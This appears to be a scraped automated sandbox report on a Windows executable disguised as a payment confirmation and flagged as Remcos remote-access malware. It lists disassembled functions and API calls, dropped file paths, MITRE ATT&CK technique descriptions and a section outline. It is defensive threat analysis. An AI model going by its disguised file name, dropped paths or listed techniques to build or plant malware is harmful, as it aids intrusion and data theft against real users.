Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp$C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll
API String ID: 1659193697-3537301365
Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E

Function 00403C62 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002F4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
CloseHandle.KERNEL32(000002FC,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 00403C98

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa1392.tmp
API String ID: 2962429428-2034990317
Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9

Function 00406059 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"), ref: 004060B2
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,C:\Users\user\AppData\Local\Temp\nsa1392.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004060C2

Strings

C:\Users\user\AppData\Local\Temp\nsa1392.tmp, xrefs: 0040605F, 00406064, 0040606A, 004060AB, 004060B1, 004060B9, 004060C1

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp
API String ID: 3248276644-1847755183
Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E

Function 0040567B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004056AA
CallWindowProcW.USER32(?,?,?,?), ref: 004056FB

Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F

Strings

, xrefs: 0040568B

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D

Function 00406550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
RegCloseKey.ADVAPI32(?), ref: 004065A1

Strings

Call, xrefs: 00406557

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4

Function 00405F9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00405FA3
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00405FB3

Strings

C:\Users\user\Desktop, xrefs: 00405F9D

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD

Function 004060D7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to lowest risk score due to lack of data" ] }
Date: unknown

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Temp\Setup.ini

C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

C:\Users\user\AppData\Local\Temp\nsa12F5.tmp

C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet\bttefulde.tox

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Daystars216.tre

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Skvinge18.alt

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Vaelger.Abr

C:\Users\user\eftermodnendes\ringeagt\Respecialisters\gramaries.Ove

Windows Analysis Report
inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Function 00403645 Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 004030D5 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 204
memoryCOMMON

Function 004066BF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406A06 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Function 6E311817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 004061A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre